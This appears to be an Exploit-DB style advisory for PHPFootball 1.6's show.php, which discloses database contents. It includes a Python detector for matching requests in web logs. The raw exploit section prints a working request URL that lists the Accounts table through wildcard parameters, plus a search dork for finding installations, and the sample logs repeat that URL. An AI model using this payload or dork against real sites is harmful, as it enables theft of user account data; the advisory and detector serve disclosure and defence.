Vendor: PHPFootball
By: ajann
CVSS: 7.5 (HIGH)
CWE: Remote Database Disclosure
Product Name: PHPFootball
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

The PHPFootball 1.6 show.php script allows remote attackers to read sensitive information from the database by specifying the dbtable, dbfield, and dbfields parameters in a request.

Mitigation:

Unknown
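
With no patch listed, requests that use these parameters can at least be spotted in web server access logs. The sketch below is an added example, not part of the advisory or of PHPFootball; it assumes Combined Log Format, and the PUBLIC_TABLES names, function names and sample log lines are hypothetical or constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: tables this installation means to expose through show.php.
# Hypothetical names; replace them with your own.
PUBLIC_TABLES = {"Teams", "Players", "Matches"}

# Request field of a Combined Log Format line, e.g. "GET /x?y HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return the reasons a log line resembles the advisory's request."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Split by hand: urlsplit() would read the advisory's "//show.php"
    # form as a host name rather than a path.
    path, _, query = m.group(1).partition("?")
    if not path.lower().endswith("/show.php"):
        return []
    # parse_qs percent-decodes, so %41ccounts and %25 are normalised.
    params = parse_qs(query, keep_blank_values=True)
    reasons = []
    for table in params.get("dbtable", []):
        if table not in PUBLIC_TABLES:
            reasons.append(f"dbtable outside allowlist: {table!r}")
    for value in params.get("dbfieldv", []):
        if value and set(value) <= {"%"}:
            reasons.append(f"dbfieldv is a bare wildcard: {value!r}")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    checked = ((n, inspect_line(l)) for n, l in enumerate(lines, start=1))
    return [(n, reasons) for n, reasons in checked if reasons]

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jan/2007:10:00:00 +0000] "GET /phpfootball//show.php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id& HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.4 - - [30/Jan/2007:10:01:00 +0000] "GET /phpfootball/show.php?dbtable=Teams&dbfield=Name&dbfieldv=Ajax&dbfields=Id HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.4 - - [30/Jan/2007:10:02:00 +0000] "GET /phpfootball/index.php HTTP/1.1" 200 700 "-" "-"',
    '203.0.113.7 - - [30/Jan/2007:10:03:00 +0000] "GET /phpfootball/show.php?dbtable=%41ccounts&dbfieldv=%25 HTTP/1.0" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, "; ".join(reasons))
```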

Exploit-DB raw data:

*******************************************************************************
# Title   :  PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://phpfootball.sourceforge.net
# $$      :  Free
# Dork    :  inurl:/phpfootball/

*******************************************************************************

[[DBREAD]]]---------------------------------------------------------

http://[target]/[path]//show.php [VARIABLES]

Example:

//show.php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id&

[dbtable] :Database Table Name
[dbfield] :Field Name
[dbfields]:Listing(Order by x)

[[/DBREAD]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-30]